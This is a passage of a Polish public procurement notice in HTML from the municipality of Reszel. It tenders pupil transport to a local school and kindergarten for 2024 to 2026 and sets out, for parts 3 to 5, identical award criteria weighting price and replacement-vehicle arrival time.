odrzuceniu.<br/>2. Za najkorzystniejszą w danej części zamówienia zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria.<br/>3. Punkty będą przyznawane wg następujących zasad: 1% = 1 punkt.<br/>4. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert (dotyczą części I, II,<br/>III, IV, V):<br/>1) Cena (C) – waga kryterium 60 %;<br/>2) Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP) – waga kryterium 40%.<br/>5. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną liczbę punktów.<br/>Pozostałym Wykonawcom, wypełniającym wymagania kryterialne przypisana zostanie proporcjonalnie mniejsza liczba punktów zgodnie z poniżej przedstawionymi wzorami do obliczenia punktowego:<br/>1) Cena (C) - waga 60%<br/>C=cena najniższa brutto*/cena oferty ocenianej brutto x 100 pkt x 60%<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Oferta z najniższą ceną otrzyma 60 punktów.<br/>b) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>c) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP) – waga 40%:<br/>a) czas podstawienia pojazdu zastępczego do 30 minut od wystąpienia awarii - 40 pkt<br/>b) czas podstawienia pojazdu zastępczego od 31 minut do 50 minut od wystąpienia awarii - 25 pkt<br/>c) czas podstawienia pojazdu zastępczego od 51 minut do 70 minut od wystąpienia awarii - 10 pkt<br/>d) czas podstawienia pojazdu zastępczego od 71 minut do 90 minut od wystąpienia awarii - 0 pkt<br/>Zamawiający zastrzega, że czas podstawienia pojazdu zastępczego nie może być dłuższy niż 90 minut. Czas podstawienia pojazdu zastępczego powinien zostać podany w przedziałach czasowych wskazanych powyżej. W przypadku wstawienia większej ilości minut niż 90 – oferta zostanie odrzucona<br/>na podstawie art. 226 ust. 1 pkt 5 Pzp.<br/>6. Ostateczny ranking ofert wyliczony zostanie według wzoru:<br/>Ok = C + CzP, gdzie:<br/>Ok – ocena końcowa,<br/>C – ilość punktów za cenę,<br/>Czp – ilość punktów za czas podstawienia pojazdu zastępczego.<br/>7. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i niepodlegających odrzuceniu.<br/>8. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>9. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą - przedstawi najkorzystniejszy<br/>bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) w terminie związania ofertą określonym w SWZ.<br/>Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>10. W przypadku, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone<br/>oferty o takiej samej cenie, takiego samego czasu podstawienia pojazdu zastępczego w razie awarii, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę oraz nowy czas podstawienia. Wykonawcy,<br/>składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach oraz<br/>dłuższego czasu podstawienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dowożenie uczniów do szkoły i przedszkola w gminie Reszel od 01.09.2024 roku do 30.06.2026 roku z wyłączeniem wakacji szkolnych w formie zakupu biletów miesięcznych.<br/>Wspólny Słownik Zamówień – CPV (art. 99 ust. 3 Pzp) - kod wiodący 60112000-6<br/>1)	Uczniowie będą dowożeni do:<br/>a)	Szkoły Podstawowej im. Adama Mickiewicza w Reszlu, ul. M .Konopnickiej 2 i B. Chrobrego 5A w Reszlu;<br/>b)	Przedszkola Samorządowego w Reszlu, ul. M .Konopnickiej 2.<br/>2) Opieka nad dowożonymi uczniami w czasie przewozów. <br/>2.	Zamówienie podzielone zostało na 5 części: <br/>Część I – Przewóz uczniów na Trasie nr 1<br/>Zamawiający dopuszcza składanie ofert częściowych. <br/>3.	Zamówienie obejmuje: świadczenie usług przewozu oraz dostawę i sprzedaż biletów miesięcznych na sieć przewozową Wykonawcy zapewniającą dowóz uczniów w dni nauki szkolnej, czyli w dni, kiedy w szkole/w przedszkolu odbywają się zajęcia edukacyjne, wychowawcze, opiekuńcze lub uroczystości szkolne dla uczniów na podstawie biletów miesięcznych nabytych na podstawie art. 5a ustawy z dnia 20 czerwca 1992 r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego w okresie od 1 września 2024 r. do 30 czerwca 2026 r. z wyłączeniem wakacji szkolnych.<br/>4.	Prognozowana miesięczna liczba uczniów objętych zamówieniem dla poszczególnych części zamówienia wynosi w roku szkolnym 2024/2025:<br/>Część III – 14.<br/>Prognozowana miesięczna liczba uczniów objętych zamówieniem dla poszczególnych części zamówienia wynosi w roku szkolnym 2025/2026:<br/>Część III – 11.<br/><br/>UWAGA!<br/>Ze względu na ograniczoną liczbę znaków pełny opis zawarto w opisie przedmiotu zamówienia, stanowiącym załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 Zamówienie, które może być udzielone zgodnie z regulacją zawartą w art. 214 ust. 1 pkt 7 Pzp, będzie polegać na powtórzeniu usług, będących przedmiotem zamówienia, opisanych w niniejszej specyfikacji<br/>warunków zamówienia do 50% szacunkowej wartości usług.<br/>1) Zamawiający udzieli zamówienia na usługi podobne w trybie z wolnej ręki poprzez przekazanie wybranemu przez siebie wykonawcy/ lub realizującemu usługi podstawowe, zaproszenie do negocjacji wraz z informacjami niezbędnymi do przeprowadzenia postępowania, w tym projektowane postanowienia umowne stanowiące podstawę negocjacji.<br/>2) W zaproszeniu do negocjacji Zamawiający określi informacje dotyczące przedmiotu zamówienia, warunków jego realizacji i innych niezbędnych parametrów zamówienia.<br/>3) Negocjacje będą prowadzone w formie ustnej, następnie udokumentowane.<br/>4) Zamawiający może żądać złożenia oświadczenia, o którym mowa w art. 125 ust.1 pzp oraz podmiotowych środków dowodowych, składane pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>2. Za najkorzystniejszą w danej części zamówienia zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria.<br/>3. Punkty będą przyznawane wg następujących zasad: 1% = 1 punkt.<br/>4. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert (dotyczą części I, II,<br/>III, IV, V):<br/>1) Cena (C) – waga kryterium 60 %;<br/>2) Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP) – waga kryterium 40%.<br/>5. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną liczbę punktów.<br/>Pozostałym Wykonawcom, wypełniającym wymagania kryterialne przypisana zostanie proporcjonalnie mniejsza liczba punktów zgodnie z poniżej przedstawionymi wzorami do obliczenia punktowego:<br/>1) Cena (C) - waga 60%<br/>C=cena najniższa brutto*/cena oferty ocenianej brutto x 100 pkt x 60%<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Oferta z najniższą ceną otrzyma 60 punktów.<br/>b) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>c) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP) – waga 40%:<br/>a) czas podstawienia pojazdu zastępczego do 30 minut od wystąpienia awarii - 40 pkt<br/>b) czas podstawienia pojazdu zastępczego od 31 minut do 50 minut od wystąpienia awarii - 25 pkt<br/>c) czas podstawienia pojazdu zastępczego od 51 minut do 70 minut od wystąpienia awarii - 10 pkt<br/>d) czas podstawienia pojazdu zastępczego od 71 minut do 90 minut od wystąpienia awarii - 0 pkt<br/>Zamawiający zastrzega, że czas podstawienia pojazdu zastępczego nie może być dłuższy niż 90 minut. Czas podstawienia pojazdu zastępczego powinien zostać podany w przedziałach czasowych wskazanych powyżej. W przypadku wstawienia większej ilości minut niż 90 – oferta zostanie odrzucona<br/>na podstawie art. 226 ust. 1 pkt 5 Pzp.<br/>6. Ostateczny ranking ofert wyliczony zostanie według wzoru:<br/>Ok = C + CzP, gdzie:<br/>Ok – ocena końcowa,<br/>C – ilość punktów za cenę,<br/>Czp – ilość punktów za czas podstawienia pojazdu zastępczego.<br/>7. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i niepodlegających odrzuceniu.<br/>8. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>9. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą - przedstawi najkorzystniejszy<br/>bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) w terminie związania ofertą określonym w SWZ.<br/>Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>10. W przypadku, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone<br/>oferty o takiej samej cenie, takiego samego czasu podstawienia pojazdu zastępczego w razie awarii, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę oraz nowy czas podstawienia. Wykonawcy,<br/>składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach oraz<br/>dłuższego czasu podstawienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dowożenie uczniów do szkoły i przedszkola w gminie Reszel od 01.09.2024 roku do 30.06.2026 roku z wyłączeniem wakacji szkolnych w formie zakupu biletów miesięcznych. <br/>Wspólny Słownik Zamówień – CPV (art. 99 ust. 3 Pzp) - kod wiodący 60112000-6<br/>1)	Uczniowie będą dowożeni do:<br/>a)	Szkoły Podstawowej im. Adama Mickiewicza w Reszlu, ul. M .Konopnickiej 2 i B. Chrobrego 5A w Reszlu;<br/>b)	Przedszkola Samorządowego w Reszlu, ul. M .Konopnickiej 2.<br/>2) Opieka nad dowożonymi uczniami w czasie przewozów. <br/>2.	Zamówienie podzielone zostało na 5 części: <br/>Część I – Przewóz uczniów na Trasie nr 1<br/>Zamawiający dopuszcza składanie ofert częściowych. <br/>3.	Zamówienie obejmuje: świadczenie usług przewozu oraz dostawę i sprzedaż biletów miesięcznych na sieć przewozową Wykonawcy zapewniającą dowóz uczniów w dni nauki szkolnej, czyli w dni, kiedy w szkole/w przedszkolu odbywają się zajęcia edukacyjne, wychowawcze, opiekuńcze lub uroczystości szkolne dla uczniów na podstawie biletów miesięcznych nabytych na podstawie art. 5a ustawy z dnia 20 czerwca 1992 r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego w okresie od 1 września 2024 r. do 30 czerwca 2026 r. z wyłączeniem wakacji szkolnych.<br/>4.	Prognozowana miesięczna liczba uczniów objętych zamówieniem dla poszczególnych części zamówienia wynosi w roku szkolnym 2024/2025:<br/>Część IV – 34.<br/>Prognozowana miesięczna liczba uczniów objętych zamówieniem dla poszczególnych części zamówienia wynosi w roku szkolnym 2025/2026:<br/>Część IV – 31.<br/><br/>UWAGA!<br/>Ze względu na ograniczoną liczbę znaków pełny opis zawarto w opisie przedmiotu zamówienia, stanowiącym załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 Zamówienie, które może być udzielone zgodnie z regulacją zawartą w art. 214 ust. 1 pkt 7 Pzp, będzie polegać na powtórzeniu usług, będących przedmiotem zamówienia, opisanych w niniejszej specyfikacji<br/>warunków zamówienia do 50% szacunkowej wartości usług.<br/>1) Zamawiający udzieli zamówienia na usługi podobne w trybie z wolnej ręki poprzez przekazanie wybranemu przez siebie wykonawcy/ lub realizującemu usługi podstawowe, zaproszenie do negocjacji wraz z informacjami niezbędnymi do przeprowadzenia postępowania, w tym projektowane postanowienia umowne stanowiące podstawę negocjacji.<br/>2) W zaproszeniu do negocjacji Zamawiający określi informacje dotyczące przedmiotu zamówienia, warunków jego realizacji i innych niezbędnych parametrów zamówienia.<br/>3) Negocjacje będą prowadzone w formie ustnej, następnie udokumentowane.<br/>4) Zamawiający może żądać złożenia oświadczenia, o którym mowa w art. 125 ust.1 pzp oraz podmiotowych środków dowodowych, składane pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>2. Za najkorzystniejszą w danej części zamówienia zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria.<br/>3. Punkty będą przyznawane wg następujących zasad: 1% = 1 punkt.<br/>4. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert (dotyczą części I, II,<br/>III, IV, V):<br/>1) Cena (C) – waga kryterium 60 %;<br/>2) Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP) – waga kryterium 40%.<br/>5. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną liczbę punktów.<br/>Pozostałym Wykonawcom, wypełniającym wymagania kryterialne przypisana zostanie proporcjonalnie mniejsza liczba punktów zgodnie z poniżej przedstawionymi wzorami do obliczenia punktowego:<br/>1) Cena (C) - waga 60%<br/>C=cena najniższa brutto*/cena oferty ocenianej brutto x 100 pkt x 60%<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Oferta z najniższą ceną otrzyma 60 punktów.<br/>b) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>c) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP) – waga 40%:<br/>a) czas podstawienia pojazdu zastępczego do 30 minut od wystąpienia awarii - 40 pkt<br/>b) czas podstawienia pojazdu zastępczego od 31 minut do 50 minut od wystąpienia awarii - 25 pkt<br/>c) czas podstawienia pojazdu zastępczego od 51 minut do 70 minut od wystąpienia awarii - 10 pkt<br/>d) czas podstawienia pojazdu zastępczego od 71 minut do 90 minut od wystąpienia awarii - 0 pkt<br/>Zamawiający zastrzega, że czas podstawienia pojazdu zastępczego nie może być dłuższy niż 90 minut. Czas podstawienia pojazdu zastępczego powinien zostać podany w przedziałach czasowych wskazanych powyżej. W przypadku wstawienia większej ilości minut niż 90 – oferta zostanie odrzucona<br/>na podstawie art. 226 ust. 1 pkt 5 Pzp.<br/>6. Ostateczny ranking ofert wyliczony zostanie według wzoru:<br/>Ok = C + CzP, gdzie:<br/>Ok – ocena końcowa,<br/>C – ilość punktów za cenę,<br/>Czp – ilość punktów za czas podstawienia pojazdu zastępczego.<br/>7. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i niepodlegających odrzuceniu.<br/>8. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>9. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą - przedstawi najkorzystniejszy<br/>bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) w terminie związania ofertą określonym w SWZ.<br/>Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>10. W przypadku, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone<br/>oferty o takiej samej cenie, takiego samego czasu podstawienia pojazdu zastępczego w razie awarii, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę oraz nowy czas podstawienia. Wykonawcy,<br/>składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach oraz<br/>dłuższego czasu podstawienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dowożenie uczniów do szkoły i przedszkola w gminie Reszel od 01.09.2024 roku do 30.06.2026 roku z wyłączeniem wakacji szkolnych w formie zakupu biletów miesięcznych. <br/>Wspólny Słownik Zamówień – CPV (art. 99 ust. 3 Pzp) - kod wiodący 60112000-6<br/>1)	Uczniowie będą dowożeni do:<br/>a)	Szkoły Podstawowej im. Adama Mickiewicza w Reszlu, ul. M .Konopnickiej 2 i B. Chrobrego 5A w Reszlu;<br/>b)	Przedszkola Samorządowego w Reszlu, ul. M .Konopnickiej 2.<br/>2) Opieka nad dowożonymi uczniami w czasie przewozów. <br/>2.	Zamówienie podzielone zostało na 5 części: <br/>Część I – Przewóz uczniów na Trasie nr 1<br/>Zamawiający dopuszcza składanie ofert częściowych. <br/>3.	Zamówienie obejmuje: świadczenie usług przewozu oraz dostawę i sprzedaż biletów miesięcznych na sieć przewozową Wykonawcy zapewniającą dowóz uczniów w dni nauki szkolnej, czyli w dni, kiedy w szkole/w przedszkolu odbywają się zajęcia edukacyjne, wychowawcze, opiekuńcze lub uroczystości szkolne dla uczniów na podstawie biletów miesięcznych nabytych na podstawie art. 5a ustawy z dnia 20 czerwca 1992 r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego w okresie od 1 września 2024 r. do 30 czerwca 2026 r. z wyłączeniem wakacji szkolnych.<br/>4.	Prognozowana miesięczna liczba uczniów objętych zamówieniem dla poszczególnych części zamówienia wynosi w roku szkolnym 2024/2025:<br/>Część V – 22.<br/>Prognozowana miesięczna liczba uczniów objętych zamówieniem dla poszczególnych części zamówienia wynosi w roku szkolnym 2025/2026:<br/>Część V – 20.<br/><br/>UWAGA!<br/>Ze względu na ograniczoną liczbę znaków pełny opis zawarto w opisie przedmiotu zamówienia, stanowiącym załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 Zamówienie, które może być udzielone zgodnie z regulacją zawartą w art. 214 ust. 1 pkt 7 Pzp, będzie polegać na powtórzeniu usług, będących przedmiotem zamówienia, opisanych w niniejszej specyfikacji warunków zamówienia do 50% szacunkowej wartości usług.<br/>1) Zamawiający udzieli zamówienia na usługi podobne w trybie z wolnej ręki poprzez przekazanie wybranemu przez siebie wykonawcy/ lub realizującemu usługi podstawowe, zaproszenie do negocjacji wraz z informacjami niezbędnymi do przeprowadzenia postępowania, w tym projektowane postanowienia umowne stanowiące podstawę negocjacji.<br/>2) W zaproszeniu do negocjacji Zamawiający określi informacje dotyczące przedmiotu zamówienia, warunków jego realizacji i innych niezbędnych parametrów zamówienia.<br/>3) Negocjacje będą prowadzone w formie ustnej, następnie udokumentowane.<br/>4) Zamawiający może żądać złożenia oświadczenia, o którym mowa w art. 125 ust.1 pzp oraz podmiotowych środków dowodowych, składane pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>2. Za najkorzystniejszą w danej części zamówienia zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria.<br/>3. Punkty będą przyznawane wg następujących zasad: 1% = 1 punkt.<br/>4. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert (dotyczą części I, II,<br/>III, IV, V):<br/>1) Cena (C) – waga kryterium 60 %;<br/>2) Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP) – waga kryterium 40%.<br/>5. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną liczbę punktów.<br/>Pozostałym Wykonawcom, wypełniającym wymagania kryterialne przypisana zostanie proporcjonalnie mniejsza liczba punktów zgodnie z poniżej przedstawionymi wzorami do obliczenia punktowego:<br/>1) Cena (C) - waga 60%<br/>C=cena najniższa brutto*/cena oferty ocenianej brutto x 100 pkt x 60%<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Oferta z najniższą ceną otrzyma 60 punktów.<br/>b) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>c) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP) – waga 40%:<br/>a) czas podstawienia pojazdu zastępczego do 30 minut od wystąpienia awarii - 40 pkt<br/>b) czas podstawienia pojazdu zastępczego od 31 minut do 50 minut od wystąpienia awarii - 25 pkt<br/>c) czas podstawienia pojazdu zastępczego od 51 minut do 70 minut od wystąpienia awarii - 10 pkt<br/>d) czas podstawienia pojazdu zastępczego od 71 minut do 90 minut od wystąpienia awarii - 0 pkt<br/>Zamawiający zastrzega, że czas podstawienia pojazdu zastępczego nie może być dłuższy niż 90 minut. Czas podstawienia pojazdu zastępczego powinien zostać podany w przedziałach czasowych wskazanych powyżej. W przypadku wstawienia większej ilości minut niż 90 – oferta zostanie odrzucona<br/>na podstawie art. 226 ust. 1 pkt 5 Pzp.<br/>6. Ostateczny ranking ofert wyliczony zostanie według wzoru:<br/>Ok = C + CzP, gdzie:<br/>Ok – ocena końcowa,<br/>C – ilość punktów za cenę,<br/>Czp – ilość punktów za czas podstawienia pojazdu zastępczego.<br/>7. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i niepodlegających odrzuceniu.<br/>8. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>9. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą - przedstawi najkorzystniejszy<br/>bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) w terminie związania ofertą określonym w SWZ.<br/>Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>10. W przypadku, gdy Zamawiający nie będzie 